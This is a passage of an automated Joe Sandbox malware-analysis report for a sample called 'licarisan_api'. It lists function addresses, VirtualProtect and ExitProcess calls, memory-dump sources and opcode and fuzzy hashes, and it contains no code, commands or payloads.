                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 6e2c87b24d673b397aabaf441ca23682710e47e2d2c984d9598db2421f608afa
                                    • Instruction ID: ddf7225be989281983d58c50b6369cbd39b1ae481b73c0ff32da8be21314f8d3
                                    • Opcode Fuzzy Hash: 6e2c87b24d673b397aabaf441ca23682710e47e2d2c984d9598db2421f608afa
                                    • Instruction Fuzzy Hash: CF31AEF2D04A599FF724CA10DC95BEB7778EB91311F0482FAD54AA6680E6389EC08F51
                                    Function 007FA013 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: e13ada47188cd293d787bb0acae1c38bb812815d70536486a92c8b4d588116e4
                                    • Instruction ID: 00bba3145614e582330ffb6f2d5abf63bb3edb411136b805b01c3978a3fe0247
                                    • Opcode Fuzzy Hash: e13ada47188cd293d787bb0acae1c38bb812815d70536486a92c8b4d588116e4
                                    • Instruction Fuzzy Hash: 6931AEF1D0425CAFFB248B14CC84BFAB775EB81310F1042F9D90956681D7BDAE868E62
                                    Function 007A59E0 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ff73686039de4ff234bc1fc3941cfc93c69208dc6521b0093af27d1908959aab
                                    • Instruction ID: 170ed9fc63909f4a4038dced1b8954e83857f5a1c3f2e53a40e69ef3d982b59a
                                    • Opcode Fuzzy Hash: ff73686039de4ff234bc1fc3941cfc93c69208dc6521b0093af27d1908959aab
                                    • Instruction Fuzzy Hash: 1C31BEF1D049699FF724CA10DC94BEA7774FB91310F0482FAD94E66680DA39AEC08F51
                                    Function 007B24B9 Relevance: 1.6, APIs: 1, Instructions: 91memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 3ee58617036eed6d30c53c0617b2a156756c841c071cfec9f512259069d5621f
                                    • Instruction ID: 26632d1e2c08678201bf9ebb56e2ed0a2c6e9cf81aa2f2337f02ef9ca57c2ca0
                                    • Opcode Fuzzy Hash: 3ee58617036eed6d30c53c0617b2a156756c841c071cfec9f512259069d5621f
                                    • Instruction Fuzzy Hash: BE31C4F2D412249FE7248B00DC50BFA7778EB95320F0480FAE90DA6281DA795EC5CF61
                                    Function 007A57AE Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 02f33c329448cfc59f8f47b4526cf410e138d2b03bfb3fcb744d285206cbdded
                                    • Instruction ID: c3e887f3eb8d4c4b978c49c4e6bfa022bac843511e28998bb4fa851fdf618634
                                    • Opcode Fuzzy Hash: 02f33c329448cfc59f8f47b4526cf410e138d2b03bfb3fcb744d285206cbdded
                                    • Instruction Fuzzy Hash: 3931B3F1D04A599FF724CA10DC95BAA7774FB91310F04C2FAD54E56680D5399EC08F51
                                    Function 007C8029 Relevance: 1.6, APIs: 1, Instructions: 89memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 0e4fbebd090903759de1a92c78106a785cdb63761228a47f39e97de1c7bb59a4
                                    • Instruction ID: cf7d6f7774d2c2eaa1e2473f6c59d55c8616fb449bce1a1f34cb75fcf0ddb8b4
                                    • Opcode Fuzzy Hash: 0e4fbebd090903759de1a92c78106a785cdb63761228a47f39e97de1c7bb59a4
                                    • Instruction Fuzzy Hash: 2021D5F2D142149EF7688A20DCC4FF77729E780314F1082FEAA0E591809A3D1EC98A62
                                    Function 007C8678 Relevance: 1.6, APIs: 1, Instructions: 88memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 6d2c9a993c3f3f857913248de5c1f826131436ce338a49a8d25a380cc8d0d5a3
                                    • Instruction ID: 18f754239912ded535de6e99f6704e9480d59c566cf71466c6c877ad80254413
                                    • Opcode Fuzzy Hash: 6d2c9a993c3f3f857913248de5c1f826131436ce338a49a8d25a380cc8d0d5a3
                                    • Instruction Fuzzy Hash: 4D3181B1D056149FF7A98A10DC95FF67778EB84314F2081EED54A9A280DA7C6EC1CF12
                                    Function 00420119 Relevance: 1.6, APIs: 1, Instructions: 84memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?), ref: 004201B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 0c2bcfeacacade840ab09a4c83c4e91df0b5b1622b80843d8742f15050bc475f
                                    • Instruction ID: f397848301ed990aa02584c71d13af16d6738c0adcfa616c890d2a2e3b4c4e2e
                                    • Opcode Fuzzy Hash: 0c2bcfeacacade840ab09a4c83c4e91df0b5b1622b80843d8742f15050bc475f
                                    • Instruction Fuzzy Hash: 0931C0B1E052289FEB24CA10DC94AEAB7B5EB84300F1041EAD50D67241D63D6FC2CE56
                                    Function 007A51B5 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 5b6b02bbc41962e0fc07f32216c40f0a8337eeaee88bdb0e73f04b86357b19d7
                                    • Instruction ID: 2e24a9bbc9d2a708057003b561639d354c17b0dfb27515fc5987ccc91e15b643
                                    • Opcode Fuzzy Hash: 5b6b02bbc41962e0fc07f32216c40f0a8337eeaee88bdb0e73f04b86357b19d7
                                    • Instruction Fuzzy Hash: 682104F2D189046FF7588A21DC55FFB7769EBD1310F14C2BEE28A126C0D93C5AC18A12
                                    Function 007C8067 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 89898f0a39a7f5afd670dc449a5b8029d390b20c3ca92a9f5a4d6034db00882d
                                    • Instruction ID: 03aa9554e4e47983e7bb35af0279ca14b77ea392968abdccd7095abe6dac280a
                                    • Opcode Fuzzy Hash: 89898f0a39a7f5afd670dc449a5b8029d390b20c3ca92a9f5a4d6034db00882d
                                    • Instruction Fuzzy Hash: 7C2146E29141149EF3688A20ECC4FF73728E780314F20C2FEEA0E091848A3D1FC58A66
                                    Function 007C80BB Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 829b5078f75fc36c060876372ebb19a31debab248eefa5319bff90fad643f37a
                                    • Instruction ID: 16857811907e5f8f33b93c138d0de4b17d7b7d669b5bba697cbcc67864217070
                                    • Opcode Fuzzy Hash: 829b5078f75fc36c060876372ebb19a31debab248eefa5319bff90fad643f37a
                                    • Instruction Fuzzy Hash: 412102B2C056249FF7648A24DCC4FB77778E780315F1082FEEA0E191848B3C5EC58A65
                                    Function 0042014B Relevance: 1.6, APIs: 1, Instructions: 79memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?), ref: 004201B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 66d8d4898ff2386ddf36373fb0435f6680e9ecfc2e28d594ca4f98da61a5a9a7
                                    • Instruction ID: d6d26002a2346c7716658bc4204bbeebea8da1991f7e983ffeb86ce547ee26e1
                                    • Opcode Fuzzy Hash: 66d8d4898ff2386ddf36373fb0435f6680e9ecfc2e28d594ca4f98da61a5a9a7
                                    • Instruction Fuzzy Hash: 7931C2B1E052249FEB24CA14DC94AEAB7B9FF84300F1441EAD50DA7241D63C6FC2CE65
                                    Function 007C8880 Relevance: 1.6, APIs: 1, Instructions: 77memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 8b906773b2be716443a00351eaaf643b0a049c1f2f115fd6499526d51b8158d7
                                    • Instruction ID: 9c67afbcbc51d8b72278c844a3fd1b5876d534e29789f14b5e890b218a305246
                                    • Opcode Fuzzy Hash: 8b906773b2be716443a00351eaaf643b0a049c1f2f115fd6499526d51b8158d7
                                    • Instruction Fuzzy Hash: 3B21A3B1D156149EE7A9CA10DC94FBA7778EB84311F2081EED54A5A280DF3C6EC1CF12
                                    Function 007B27B5 Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 6e3c9b783f1c8fee03bd68efdbf831efe4fa4bbea802bb85b962f353675cb138
                                    • Instruction ID: e3536490f3e2b11a6b7dbaa3fed20e74532b46d08f419d83f96687498955bbfe
                                    • Opcode Fuzzy Hash: 6e3c9b783f1c8fee03bd68efdbf831efe4fa4bbea802bb85b962f353675cb138
                                    • Instruction Fuzzy Hash: 8621F4B1D062549FEB148B10DCA4BEE7B79EB81310F1481FAD90DD6242D6395EC5CF51
                                    Function 007A51CF Relevance: 1.6, APIs: 1, Instructions: 73memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: c51248f09cd72283f6fe3c92b97dbc9e3220737b63d9fd9c11fd55dcd3bc7142
                                    • Instruction ID: 544dc8f57cb46dba4c9ab08a7e62fd53437b695382b03e7df50d24ca14616a4a
                                    • Opcode Fuzzy Hash: c51248f09cd72283f6fe3c92b97dbc9e3220737b63d9fd9c11fd55dcd3bc7142
                                    • Instruction Fuzzy Hash: D221C0F2E145146FF3688A21DC59FBB7769EBD1310F14C2BEE24A566C0D93C5AC18A11
                                    Function 007BD0F7 Relevance: 1.6, APIs: 1, Instructions: 70memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: cb4c1feed9e8ab14e498cbe3f0291ccc4f186e5160fd8feb8c014e21ad0f6f51
                                    • Instruction ID: 0fa3b86dc8ad801094045cc45745c01bb07f4ad295e62eaef5fb441aadfc9bc6
                                    • Opcode Fuzzy Hash: cb4c1feed9e8ab14e498cbe3f0291ccc4f186e5160fd8feb8c014e21ad0f6f51
                                    • Instruction Fuzzy Hash: 3721B0B2D0911C9BEB31CA18CC947EA77B9EB40310F1181EAE50DE6240E63D9EC5CF41
                                    Function 007BD109 Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ef4b198b5a2a94d1afc0625931c7ebb526579f6ebde9eac28d64bf6e4cec3310
                                    • Instruction ID: 00d0b374457bcd5ed0d9606cb0be7b9f20f9d001c87ab70ffd589b276895cebe
                                    • Opcode Fuzzy Hash: ef4b198b5a2a94d1afc0625931c7ebb526579f6ebde9eac28d64bf6e4cec3310
                                    • Instruction Fuzzy Hash: 0621A1B1D0911C9FEB31CA18CC94BEA7BB9EB40311F1481EAE50DE6240E67D9E85CF41
                                    Function 007A5253 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 4b743c446bfedc348ad90e6a62f34e2fd71acfe2ff84e10be9bb2e1280c1a52c
                                    • Instruction ID: 408aa76805c5df04b21313daa7dffcb9563dce8a0eb7d8935314e90863150db0
                                    • Opcode Fuzzy Hash: 4b743c446bfedc348ad90e6a62f34e2fd71acfe2ff84e10be9bb2e1280c1a52c
                                    • Instruction Fuzzy Hash: C11104F2D145086FF7688A21EC55FBB3669E7C1310F04C2BEE24E165C0D93C5AC08B51
                                    Function 007B2832 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 64faf9716ebfafaa2c50823ba0d4f61eba65ab225aefa3ad6a3a7b3122b2be6d
                                    • Instruction ID: 7de588258ae618b715662185d29251894bf6cfef6455d193f61272af606000e3
                                    • Opcode Fuzzy Hash: 64faf9716ebfafaa2c50823ba0d4f61eba65ab225aefa3ad6a3a7b3122b2be6d
                                    • Instruction Fuzzy Hash: 3321D1B2E062589FEB24CB14DC94BED77B5FF85310F0441EAD80DA6282CA385EC58F10
                                    Function 00802722 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0080FDEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 927871b5f0281f19efd2c136cf81d0f6fe2f14744662c919d68fb38f78c933bc
                                    • Instruction ID: 5221dc0c4641891c92e724ae07400daafb217fc5018d0930a546f4a591f1a124
                                    • Opcode Fuzzy Hash: 927871b5f0281f19efd2c136cf81d0f6fe2f14744662c919d68fb38f78c933bc
                                    • Instruction Fuzzy Hash: 3C1122A2A08108AAF7744A24DD49BF77779FBC0318F10C1BEE60A5AC85C37D0A869911
                                    Function 00437454 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 571276edcc534549a83365dfe23df2dc37f99d4a80bcb0eb9cb31d81955f3edf
                                    • Instruction ID: 646dfcdc70eee91063db88894666cc5d4c4047e85ba599eee2a12b591002009e
                                    • Opcode Fuzzy Hash: 571276edcc534549a83365dfe23df2dc37f99d4a80bcb0eb9cb31d81955f3edf
                                    • Instruction Fuzzy Hash: 601100F2D045046BF7248A10DC5ABEA7774EB88714F1480FFE94E52680E63C6EC18E22
                                    Function 007BD11C Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: d6c40dd0e7ca687b2e8b8ac6b25433044e47742aa1f53f4d3bafdc2ea71a689d
                                    • Instruction ID: 2a5ff533f8d5d584a2338d7bb7172dda7bf0f23ecf23f71b4879acbd49d8d64a
                                    • Opcode Fuzzy Hash: d6c40dd0e7ca687b2e8b8ac6b25433044e47742aa1f53f4d3bafdc2ea71a689d
                                    • Instruction Fuzzy Hash: 2C21A2B1D0911C9FEB31CA68DC94BEA77B8EB44311F1441EAE50DE6240E6399F85CF41
                                    Function 007C892B Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: bdb8aea21a4cb6bfb0e977599fe7d2eb8626027c0e7df650af6ff75e88c5adc9
                                    • Instruction ID: 2ace93a5d6c33d2c46a5669e3c26b928176cc818fceff40523d5a05fd7932122
                                    • Opcode Fuzzy Hash: bdb8aea21a4cb6bfb0e977599fe7d2eb8626027c0e7df650af6ff75e88c5adc9
                                    • Instruction Fuzzy Hash: C42172B1D156189FD7A9CB50CC94FB6B778EB84315F2081EED54B5A280DA386EC0DF12
                                    Function 007C8C12 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 338b44fe340f13122142fafbf4942da94926d540e2e7de9f997a5a9d91911dc8
                                    • Instruction ID: 9210651c51fa8130da55caca2d6c30c85dac58d59de9790bb6e65e304811c39b
                                    • Opcode Fuzzy Hash: 338b44fe340f13122142fafbf4942da94926d540e2e7de9f997a5a9d91911dc8
                                    • Instruction Fuzzy Hash: 0211B1709045688FDB798B20DCD4BFAB7B4EB85305F2082EED54B5A181CA381EC1CF26
                                    Function 007FA39A Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 27b40cba31297443125013a48a68abcbb9545012ddfd3115df1035a972cf1093
                                    • Instruction ID: cc28e87b3a1f63867b976277e051feca64d45de12b6ede671d07a7ba3beef9b4
                                    • Opcode Fuzzy Hash: 27b40cba31297443125013a48a68abcbb9545012ddfd3115df1035a972cf1093
                                    • Instruction Fuzzy Hash: EC11C4F090425DAFDB248B65CD849FAB774EF41340F1041FEDA4956381E679AD868B12
                                    Function 00437AC1 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: fdadeb56a7fee1d41a01a609606f364b414a363698e19b925f87e7e1a6cfe0ee
                                    • Instruction ID: d1e90c05c289c9bbcd95f7da87344f31754be87a64ef52ff4a9679d0bc0f234e
                                    • Opcode Fuzzy Hash: fdadeb56a7fee1d41a01a609606f364b414a363698e19b925f87e7e1a6cfe0ee
                                    • Instruction Fuzzy Hash: B92195B1D091A98FEB30DB24CC947E9BB71BF46319F1441EBC499A6282D2345E85CF85
                                    Function 007FA0E7 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 1ea211b48a1c89fc4a169d404989650432a079080c0ebfeb6980fea38ed6cff9
                                    • Instruction ID: fdd3ee6f72d8bc555d22e06641de1327b6ea9c4c02bab4dde29e9a7c87c5002b
                                    • Opcode Fuzzy Hash: 1ea211b48a1c89fc4a169d404989650432a079080c0ebfeb6980fea38ed6cff9
                                    • Instruction Fuzzy Hash: FD11E3F090425DAFEB208B55CC849FAB774EF41340F1041FEEA4996241D679AD868E12
                                    Function 007FA13E Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516916549.00000000007FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007FA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7fa000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 893f70fde454d93de69ae348da3fbf791ad5e53566c5318d9151d33108bd914f
                                    • Instruction ID: 44e78fdbe2531972f61e2e1d702980f19c0fcf198fcce99a75da20e15e0b3d15
                                    • Opcode Fuzzy Hash: 893f70fde454d93de69ae348da3fbf791ad5e53566c5318d9151d33108bd914f
                                    • Instruction Fuzzy Hash: A111E0F090425DAFEB248B55CC849FAB778EF41300F1042FEEA4A56381D679AD868E12
                                    Function 007FA119 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?), ref: 007FA422
                                    Memory Dump Source
